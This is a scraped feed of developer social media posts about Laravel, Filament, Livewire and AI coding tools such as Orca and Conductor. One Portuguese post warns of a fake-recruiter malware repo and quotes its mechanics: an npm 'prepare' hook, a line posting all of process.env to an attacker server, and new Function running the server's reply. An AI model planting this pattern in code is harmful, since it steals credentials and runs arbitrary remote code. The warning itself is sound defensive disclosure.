Leandro Ferreira

I'm honored to be part of this team! 💛 I truly appreciate this opportunity and look forward to continuing my learning journey to contribute even more to this amazing Filament community! 🚀

@mateusjatenee 🔥🔥

lets gooooo

@calebporzio Looks great 🔥🔥

had Fable crank something out and almost immediately feel like it's going to consume the next 6 months of my life lol feels like the future of Flux, maybe all app dev?

@Kartikio @orca_build 🔥🔥

@leandrocfe @orca_build love using it, i have tried so many IDE's, this is the best, was using cmux, warp before, dumped them, this just has everything you need

Meet @orca_build ✨ Multi-agent support Worktrees per task GitHub integration Mobile app to sync and continue anywhere 🔥 Just an open source tool built around the agentic workflow. Try it 🚀 (link in first reply)

@devajmeireles @orca_build @getpolyscope You can open issues on Github ✌️

@leandrocfe @orca_build I spent 12 hours on this and, like Conductor, Superset, @getpolyscope, and Soloterm, this one also has some annoying bugs, although they are few. I can't find a better setup than iTerm2 + tmux; it seems unbelievable, but it's the absolute truth.

@MACscr @orca_build No, just trying and using it ✌️

@leandrocfe @orca_build Leandro, this is something you built?

@calebporzio 👌

Was really fun writing the "pitch" for the new Livewire site. Forced me to remember why I even built Livewire. I think the most compelling Livewire scenario HAS to be: a button

@orca_build onorca.dev

@devajmeireles @freekmurze @orca_build Orca allows it ✌️

@leandrocfe @freekmurze @orca_build Do they allow local merging?

Tested out a bunch of AI harnesses again, and Conductor seems to have sticked conductor.build Fast, bug free, easy to configure isolated workspaces (it takes care of changing APP_URL etc), handling GitHub stuff well, kickass diff-viewer, not overwhelming...

@JinjingLiang Nice work btw 💪. I use Orca every day 🔥

@leandrocfe Of course!

Guys you have to check this out... Codex & Opus struggled for days with Orca’s slow Windows bootup time. Fable solved it in minutes. The next version of Orca is going to load SUPER FAST on Windows!!

I'm giving away my book on building Laravel APIs developers actually want to use. Before you download 300 pages, here are the tips worth stealing first: contract-first design, versioning from day one, RFC 9457 errors, idempotency, audit logs. Free read: juststeveking.com/articles/api-t…

The #PHPverse is open!! 🌠 PHP is louder, bigger, and more alive than ever – and it all starts with @brendt_gd and @enunomaduro. Are you in? We are starting in 15 mins! 👇 youtube.com/live/NR9L0zwXJ…

Filament's AI tooling just got better. Now you can use the same Blueprint you already know and love that helps you build incredible Filament apps to scan your application for common security mistakes and help you quickly find a solution! Check out the blog post for more info!

🔎 New in Filament Blueprint: the "Filament Security Audit" skill Ask an agent to check your Filament app against common security mistakes, then write a report and remediation plan. It will check access control, uploads, XSS, query scoping, and more. Blog post in the replies 👇

I’m still open for new projects ✨ Would love to help a Laravel, dev-tool, SaaS, or open-source team make their website feel more polished, friendly, and beautiful. Grateful for any intros or shares 🥰

@awcodes1 💯

If you need a designer/developer book Hassan as soon as you can. He’s really good.

⚠️ Devs, parem tudo e leiam. Quase rodei malware na minha máquina agora mesmo e quero que vocês saibam exatamente como funciona o golpe. Recebi um link de um repo no GitHub: um "MVP" de um projeto web3/poker, com pedido pra clonar e rodar localmente. Visual de teste técnico, daqueles que recruiter manda. Antes de tocar em qualquer coisa, parei e li o código pelo próprio GitHub, sem clonar. Bem que desconfiei. Era malware. E não um qualquer — tinha DOIS payloads que executam SOZINHOS, sem você rodar nada explicitamente. 🎯 Payload 1 — dispara no `npm install` O `package.json` tinha `"prepare": "node server/server.js"`. O detalhe maldoso: o script `prepare` roda AUTOMÁTICO toda vez que você dá `npm install`. Dentro dele, escondido nas rotas do servidor, um: `axios.post(url, { ...process.env })` Ou seja: ele empacota TODAS as suas variáveis de ambiente — chaves de AWS, tokens de API, secrets, seed phrase de carteira cripto — e manda pro servidor do atacante. E não para aí: a RESPOSTA do servidor é passada pra `new Function("require", resposta)(require)`. Isso é execução de código arbitrário, com acesso total ao Node: filesystem, child_process, rede. Ele pode roubar suas chaves SSH, instalar persistência, o que quiser. A URL do atacante? Escondida em base64 no `.env`, decodificando pra um domínio na Vercel. Disfarce em cima de disfarce.

Hey friends! 👋 I’m looking for new projects & opportunities✨🥰 Feel free to reach out or tag someone who might be looking 🙏 👇 Here's my portfolio: zahirnia.com